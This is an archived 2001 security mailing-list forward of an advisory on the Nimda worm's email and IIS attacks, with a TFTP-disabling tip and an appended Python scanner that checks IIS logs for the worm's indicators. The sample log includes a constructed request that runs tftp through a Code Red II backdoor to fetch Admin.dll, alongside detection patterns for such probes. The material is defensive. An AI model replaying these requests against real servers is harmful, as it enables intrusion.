FW: [iwar] [fc:More.on.the.worms...] (fwd)

From: Toby Kohlenberg (toby@private)
Date: Tue Sep 18 2001 - 15:39:09 PDT


    ---------- Forwarded message ----------
    Date: Tue, 18 Sep 2001 14:35:59 -0700
    From: "Kohlenberg, Toby" <toby.kohlenberg@private>
    To: "'toby@private'" <toby@private>
    Subject: FW: [iwar] [fc:More.on.the.worms...]
    
    -----Original Message-----
    From: Fred Cohen [mailto:fc@private]
    Sent: Tuesday, September 18, 2001 9:21 AM
    To: iwar@private
    Subject: [iwar] [fc:More.on.the.worms...]
    
    There have been numerous reports of IIS attacks being generated by
    machines over a broad range of IP addresses. These "infected"
    machines are using a wide variety of attacks which attempt to exploit
    already known and patched vulnerabilities against IIS.
    
    It appears that the attacks can come both from email and from the
    network.
    
    A new worm, being called w32.nimda.amm, is being sent around. The
    attachment is called README.EXE and comes as a MIME-type of
    "audio/x-wav" together with some html parts. There appears to be no
    text in this message when it is displayed by Outlook in
    Auto-Preview mode (always a good indication there's something not
    quite right with an email).
    
    The network attacks against IIS boxes are a wide variety of attacks.
    Amongst them appear to be several attacks that assume the machine is
    compromised by Code Red II (looking for ROOT.EXE in the /scripts and
    /msadc directory, as well as an attempt to use the /c and /d virtual
    roots to get to CMD.EXE). Further, it attempts to exploit numerous
    other known IIS vulnerabilities.
    
    One thing to note is the attempt to execute TFTP.EXE to download a
    file called ADMIN.DLL from (presumably) some previously compromised
    box.
    
    Anyone who discovers a compromised machine (a machine with ADMIN.DLL
    in the /scripts directory), please forward me a copy of that .dll
    ASAP.
    
    Also, look for TFTP traffic (UDP 69). As a safeguard, consider doing
    the following:
    
    edit %systemroot%\system32\drivers\etc\services.
    
    change the line:
    
    tftp 69/udp
    
    to:
    
    tftp 0/udp
    
    thereby disabling the TFTP client. W2K has TFTP.EXE protected by
    Windows File Protection, so it can't be removed.
    
    More information as it arises.
    
    Cheers,
    Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
    
    
    
    ------------------
    http://all.net/ 
    
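The probes Russ describes (ROOT.EXE requested under /scripts or /msadc, CMD.EXE reached through the /c and /d virtual roots, and a TFTP fetch of ADMIN.DLL) leave distinctive entries in IIS W3C extended logs. The following is an added example, not part of the original mail, that scans such logs for those indicators; the log lines, IP addresses and indicator names are constructed for illustration.

```python
import re
from typing import Dict, List, Set

# URI-stem indicators taken from the advisory: ROOT.EXE left behind by
# Code Red II in /scripts or /msadc, and CMD.EXE reached via the /c or /d
# virtual roots. Case-insensitive because IIS paths are.
INDICATORS = {
    "coderedii_backdoor": re.compile(r"^/(scripts|msadc)/root\.exe$", re.I),
    "virtual_root_cmd":   re.compile(r"^/[cd]/.*cmd\.exe$", re.I),
}
# Query-string indicator: the TFTP client being used to pull ADMIN.DLL.
TFTP_ADMIN_DLL = re.compile(r"tftp.*admin\.dll", re.I)

def classify_request(uri_stem: str, query: str) -> Set[str]:
    """Return the set of indicator names matched by one IIS request."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(uri_stem)}
    if TFTP_ADMIN_DLL.search(query):
        hits.add("tftp_admin_dll")   # strongest signal: a dropper fetch
    return hits

def scan_iis_log(lines: List[str]) -> List[Dict]:
    """Parse W3C extended log lines (the #Fields header names the columns)
    and return one record per request that matches an indicator."""
    fields, findings = [], []
    for lineno, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        rec = dict(zip(fields, line.split()))
        hits = classify_request(rec.get("cs-uri-stem", ""),
                                rec.get("cs-uri-query", "-"))
        if hits:
            findings.append({"line": lineno, "client": rec.get("c-ip"),
                             "hits": hits})
    return findings

# Constructed sample log (not a real capture), IIS 5 W3C extended format.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 09:01:02 192.0.2.10 GET /default.htm - 200
2001-09-18 09:01:05 192.0.2.77 GET /scripts/root.exe /c+dir 404
2001-09-18 09:01:06 192.0.2.77 GET /MSADC/root.exe /c+dir 404
2001-09-18 09:01:07 192.0.2.77 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 09:01:08 192.0.2.77 GET /d/winnt/system32/cmd.exe /c+dir 404
2001-09-18 09:01:09 192.0.2.77 GET /scripts/root.exe /c+tftp%20-i%20192.0.2.77%20GET%20Admin.dll 200
""".splitlines()

if __name__ == "__main__":
    for finding in scan_iis_log(SAMPLE_LOG):
        print(finding)
```

A 200 status on the tftp line (as opposed to the 404s on the probes) is what distinguishes a host that actually ran the fetch from one that was merely scanned; pair it with the UDP/69 traffic check above.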
    



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:06 PDT